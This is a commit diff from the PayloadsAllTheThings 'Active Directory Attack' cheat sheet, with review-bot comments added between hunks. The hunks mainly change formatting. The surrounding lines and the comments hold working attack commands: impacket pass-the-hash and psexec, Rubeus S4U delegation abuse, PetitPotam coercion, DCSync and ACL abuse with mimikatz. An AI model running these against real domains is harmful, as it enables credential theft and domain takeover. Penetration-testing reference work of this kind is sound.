mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update Active Directory Attack.md
This commit is contained in:
parent
8045496946
commit
09b1b8984a
1 changed files with 20 additions and 21 deletions
@ -1596,7 +1596,7 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
|
||||||
Requirements :
|
Requirements :
|
||||||
* Domain Controller on (at least) Windows Server 2016
|
* Domain Controller on (at least) Windows Server 2016
|
||||||
* PKINIT Kerberos authentication
|
* PKINIT Kerberos authentication
|
||||||
* An account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object
|
* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object
|
||||||
|
|
||||||
Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
|
Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
|
||||||
|
|
||||||
|
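Review bot: the `PKINIT Kerberos authentication` bullet in this hunk is underspecified, and the hunk only adds backticks around `msDS-KeyCredentialLink` without saying what the precondition actually is. Spell out that the domain controller must hold a certificate usable for PKINIT (in practice one issued by AD CS), and that the `Windows Server 2016` bullet exists because Key Trust authentication against `msDS-KeyCredentialLink` is only honoured by 2016 and later domain controllers; without both, the TGT request described in the following paragraph is refused even with write access to the attribute.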
@ -1667,17 +1667,17 @@ In this technique, instead of passing the hash directly, we use the NTLM hash of
|
||||||
|
|
||||||
#### Using impacket
|
#### Using impacket
|
||||||
|
|
||||||
```powershell
|
```bash
|
||||||
root@kali:impacket-examples$ python ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
|
root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com
|
||||||
root@kali:impacket-examples$ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
|
root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
|
||||||
root@kali:impacket-examples$ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
|
root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
|
||||||
|
|
||||||
also with the AES Key if you have it
|
# also with the AES Key if you have it
|
||||||
root@kali:impacket-examples$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
||||||
|
|
||||||
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
||||||
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
||||||
klist
|
root@kali:~$ klist
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Using Rubeus
|
#### Using Rubeus
|
||||||
|
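Review bot: the prompt rewrite in this hunk (`root@kali:impacket-examples$` to `root@kali:~$`) leaves `./getTGT.py` and `psexec.py` pointing at files that are no longer in the working directory, so the block as shown fails with a file-not-found unless the examples directory is on PATH; either keep the directory in the prompt or call the installed entry points. The same block carries several defects the hunk touches but does not fix: `python ./getTGT.py` versus `python3 psexec.py` (pick one interpreter), `-e arcfour-hma-md5` on the `ktutil` line should be `arcfour-hmac-md5`, `kinit -t ~/mykers` does not match the `~/mykeys` keytab created on the line before, the NT hash `1a59bd44fe5bec39c44c8cd3524dee` is 30 hex characters where an NT hash is 32, and `getTGT.py` takes its target as `domain/user`, so `lab.ropnop.com` on its own carries no username. Turning `also with the AES Key if you have it` into a `#` comment is the right fix for that line.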
@ -1770,10 +1770,10 @@ NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||||
|
|
||||||
| Hash | Hashcat | Attack method |
|
| Hash | Hashcat | Attack method |
|
||||||
|---|---|---|
|
|---|---|---|
|
||||||
| LM | 3000 | crack/pass the hash |
|
| LM | `3000` | crack/pass the hash |
|
||||||
| NTLM/NTHash | 1000 | crack/pass the hash |
|
| NTLM/NTHash | `1000` | crack/pass the hash |
|
||||||
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
|
| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack |
|
||||||
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
|
| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack |
|
||||||
|
|
||||||
Crack the hash with `hashcat`.
|
Crack the hash with `hashcat`.
|
||||||
|
|
||||||
|
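Review bot: the `Attack method` column (the NTLMv1 and NTLMv2 rows of this table) needs one sentence explaining why those rows say `relay` rather than `pass the hash`: Net-NTLM values are challenge-response hashes, not stored credentials, so they cannot be replayed as a pass-the-hash credential and can only be cracked offline or relayed while the authentication is in flight. Since the backticked numbers are hashcat `-m` modes, rename the column `Hashcat mode (-m)` so the `Crack the hash with hashcat` line below reads unambiguously.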
@ -1846,7 +1846,7 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
||||||
|
|
||||||
#### SMB Signing Disabled and IPv6
|
#### SMB Signing Disabled and IPv6
|
||||||
|
|
||||||
Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
|
Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
crackmapexec smb $hosts --gen-relay-list relay.txt
|
crackmapexec smb $hosts --gen-relay-list relay.txt
|
||||||
|
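Review bot: the code fence under `#### SMB Signing Disabled and IPv6` stays ```powershell while it contains `crackmapexec smb $hosts --gen-relay-list relay.txt`, a command typed into a Linux shell; this commit retags the other Linux-tool blocks to ```bash and should do the same here, and `$hosts` should be described (a file or CIDR range) since it is never defined. The MS16-077 link is a good addition, but the sentence does not say why it sits under an IPv6 heading: add that, with broadcast name resolution no longer used for WPAD, the lookup goes through DNS, which is why the attack in this section depends on controlling the victim's DNS server over IPv6.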
@ -2068,7 +2068,6 @@ If you do not want modified ACLs to be overwritten every hour, you should change
|
||||||
|
|
||||||
> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
|
> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
|
||||||
|
|
||||||
|
|
||||||
Find users with `AdminCount=1`.
|
Find users with `AdminCount=1`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
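Review bot: the `AdminCount` blockquote kept in this hunk says the attribute is set for `any privileged group`, which is too broad; it is set by the SDProp process on members of the AdminSDHolder protected groups (Domain Admins, Enterprise Admins, Administrators, Account Operators and the other built-in operator groups), and the `every hour` in the hunk's leading context line refers to that same SDProp run. Suggest `assigned to one of the AdminSDHolder protected groups`, plus a sentence that a user with `AdminCount=1` who has since been removed keeps the copied ACL with inheritance disabled, which is why the `Find users with AdminCount=1` query below is useful for spotting stale admins.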
@ -2194,7 +2193,7 @@ NOTE: To not alert the user the payload should hide its own process window and s
|
||||||
|
|
||||||
#### WriteDACL
|
#### WriteDACL
|
||||||
|
|
||||||
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
|
To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
|
||||||
|
|
||||||
* WriteDACL on Domain
|
* WriteDACL on Domain
|
||||||
```powershell
|
```powershell
|
||||||
|
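Review bot: the hunk backticks `WriteDacl` in the paragraph, but the heading (`#### WriteDACL`) and the bullet (`* WriteDACL on Domain`) in the same hunk keep the `WriteDACL` spelling, so the section now uses two casings for the same right; pick one. Two wording fixes in the same sentence: `ACLs in Active Directory that are unsafe configured` should read `unsafely configured`, and the two extended rights read better as `Replicating Directory Changes` and `Replicating Directory Changes All` in backticks rather than joined by a slash, since they are two separate ACEs that both have to be granted for DCSync to work.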
@ -2247,7 +2246,7 @@ ConvertFrom-ADManagedPasswordBlob $mp
|
||||||
#### ForceChangePassword
|
#### ForceChangePassword
|
||||||
|
|
||||||
An attacker can change the password of the user this ACE applies to.
|
An attacker can change the password of the user this ACE applies to.
|
||||||
This can be achieved with Set-DomainUserPassword (PowerView module).
|
This can be achieved with `Set-DomainUserPassword` (PowerView module).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||||||
|
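Review bot: the `ForceChangePassword` text in this hunk should say that this is a password reset, not a password change: the ACE corresponds to the `User-Force-Change-Password` extended right, which allows setting a new password without knowing the current one, which is why `Set-DomainUserPassword` only needs the `$NewPassword` secure string prepared on the hunk's last line. Add the operational caveat that the reset locks the legitimate user out and is logged on the domain controller as event 4724 (password reset) rather than 4723 (user-initiated change), so it is noisier than the other ACE abuses in this section.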
@ -2565,7 +2564,7 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
|
||||||
|
|
||||||
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
||||||
|
|
||||||
```powershell
|
```bash
|
||||||
# Coerce the callback
|
# Coerce the callback
|
||||||
git clone https://github.com/topotam/PetitPotam
|
git clone https://github.com/topotam/PetitPotam
|
||||||
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
||||||
|
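Review bot: the PetitPotam block in this hunk runs `python3 petitpotam.py` directly after `git clone https://github.com/topotam/PetitPotam` without changing into the cloned directory, so as written the script is not found; add a `cd PetitPotam` and check the script filename's case against the repository, since the path is case-sensitive on Linux. The ```powershell to ```bash change is correct. Worth documenting next to `-u $USER -p $PASSWORD` that the tool also accepts empty credentials against hosts that have not been patched against unauthenticated EFSRPC coercion.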
@ -2593,11 +2592,11 @@ $ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
|
||||||
#### Exploit the Constrained Delegation
|
#### Exploit the Constrained Delegation
|
||||||
|
|
||||||
* Impacket
|
* Impacket
|
||||||
```ps1
|
```bash
|
||||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||||
```
|
```
|
||||||
* Rubeus
|
* Rubeus
|
||||||
```ps1
|
```bash
|
||||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||||
|
|
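Review bot: the second fence change in this hunk (the Rubeus block, `./Rubeus.exe tgtdeleg /nowrap ...`) retags a Windows command block from ```ps1 to ```bash, which is wrong in the other direction: Rubeus runs from a Windows shell, so keep ```ps1 (or ```powershell, matching the rest of the file) and retag only the impacket `getST.py` block to ```bash; the `$ ` prompts are also out of place in a Windows block. Two documentation points: the `getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password'` line should say that `user` must be the account holding the `msDS-AllowedToDelegateTo` entry queried in the hunk's leading context line, and the `/altservice:cifs,http,host,rpcss,wsman,ldap` line deserves a sentence explaining that the service class in the ticket's sname is not covered by the ticket's encryption, which is what lets one delegated SPN be rewritten to other services on the same host.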